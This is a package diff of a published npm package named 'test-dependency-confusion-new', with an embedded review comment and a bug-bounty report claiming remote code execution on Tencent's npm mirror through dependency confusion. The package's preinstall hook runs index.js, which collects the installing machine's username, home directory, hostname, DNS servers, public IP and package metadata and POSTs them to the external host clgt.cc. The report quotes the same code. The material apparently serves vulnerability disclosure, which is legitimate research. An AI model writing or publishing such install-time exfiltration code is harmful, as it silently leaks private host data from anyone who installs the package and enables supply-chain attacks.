test-dependency-confusion-new 1.0.3
- package/index.js +86 -0
- package/package.json +12 -0
- package/rce +78 -0
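--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,86 @@
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+let have_child_process = true
+try {
+const { exec } = require('child_process')
+} catch(e) {
+have_child_process = false
+}
+
+const sleep = (milliseconds) => {
+return new Promise(resolve => setTimeout(resolve, milliseconds))
+}
+
+function requestPromise(endpoint) {
+var body = ''
+
+return new Promise(function(resolve, reject){
+https.get((endpoint), res => {
+res.setEncoding('utf8');
+res.on("data", data => {
+body += data;
+});
+res.on("end", () => {
+resolve(body)
+});
+res.on("error", (e) => {
+reject(e);
+});
+});
+});
+
+}
+
+async function main() {
+
+const url = 'https://ifconfig.me'
+const ip = await requestPromise(url)
+
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+ip: ip,
+child_process: have_child_process ? 1 : 0,
+});
+
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+
+var options = {
+hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
+port: 443,
+path: "/dependency-conf-npm.php",
+method: "POST",
+headers: {
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": postData.length,
+},
+};
+
+var req = https.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+
+req.on("error", (e) => {
+// console.error(e);
+});
+
+req.write(postData);
+req.end();
+} main()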
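Review bot: The preinstall entry point ships far more host data than a reachability proof needs: `un: os.userInfo().username`, `hd: os.homedir()`, `dns: dns.getServers()`, `c: __dirname` and the whole `pjson: packageJSON` are serialized at lines 44-56 and POSTed to a hard-coded external host at lines 63-85, and the `"preinstall": "node index.js"` hook in package/package.json runs this on every machine that installs with lifecycle scripts enabled. For a disclosure PoC the beacon should carry only the package name and version; the username, home directory and resolver list are personal and network-topology data that the report in package/rce does not rely on. Consumers can neutralize this class of package with `npm install --ignore-scripts`, and install-time network egress from a lifecycle script is the signal worth alerting on. Style: `const { exec } = require('child_process')` at line 10 is only a presence probe and `exec` is never used, `sleep` at lines 15-17 is dead code, and `package` at line 6 is a reserved word that fails to parse under `'use strict'`.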
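--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,12 @@
+{
+"name": "test-dependency-confusion-new",
+"version": "1.0.3",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall": "node index.js"
+},
+"author": "",
+"license": "ISC"
+}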
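--- a/package/rce
+++ b/package/rce
@@ -0,0 +1,78 @@
+Dear Team,
+
+I have found a RCE vulnerability on your mirrors.tencent.com server via dependency confusion
+
+1. Detailed Description :
+- The vulnerability is very simple, your mirrors.tencent.com server is monitoring all packages on npmjs.com. When you found any new package, you do sync new package to your server and do something including install new package
+- So If I create a new package for example this case, name: test-dependency-confusion, here is package.json
+```
+> cat package.json
+{
+"name": "test-dependency-confusion",
+"version": "1.0.2",
+"description": "",
+"main": "index.js",
+"scripts": {
+"test": "echo \"Error: no test specified\" && exit 1",
+"preinstall": "node index.js"
+},
+"author": "",
+"license": "ISC"
+}
+```
+You can see in scripts section, preinstall: node index.js
+I have create index.js, do following:
+** collection current server information: user, current working directory, os name, ip address (via call http://ifconfig.me)**
+** Then I send all information to my server https://clgt.cc/**
+Here is source code
+```
+const trackingData = JSON.stringify({
+p: package,
+c: __dirname,
+hd: os.homedir(),
+hn: os.hostname(),
+un: os.userInfo().username,
+dns: dns.getServers(),
+r: packageJSON ? packageJSON.___resolved : undefined,
+v: packageJSON.version,
+pjson: packageJSON,
+ip: ip,
+child_process: have_child_process ? 1 : 0,
+});
+
+
+var postData = querystring.stringify({
+msg: trackingData,
+});
+
+var options = {
+hostname: "clgt.cc", //replace burpcollaborator.net with Interactsh or pipedream
+port: 443,
+path: "/dependency-conf-npm.php",
+method: "POST",
+headers: {
+"Content-Type": "application/x-www-form-urlencoded",
+"Content-Length": postData.length,
+},
+};
+
+var req = https.request(options, (res) => {
+res.on("data", (d) => {
+process.stdout.write(d);
+});
+});
+```
+
+- I do something and push to npmjs repository, I get the link publish https://www.npmjs.com/package/test-dependency-confusion
+- wait for some minutes, I got signal request to my server with the information, there are some servers from you
+
+2. Proof :
+Please do check my attachment images
+
+3. Impact
+An attacker can do remote code execution on your server
+
+3. How to fix :
+- I think after download/sync package, you should check preinstall script is existed or not. If it exists, do check or remove it
+
+Thanks and Best Regards,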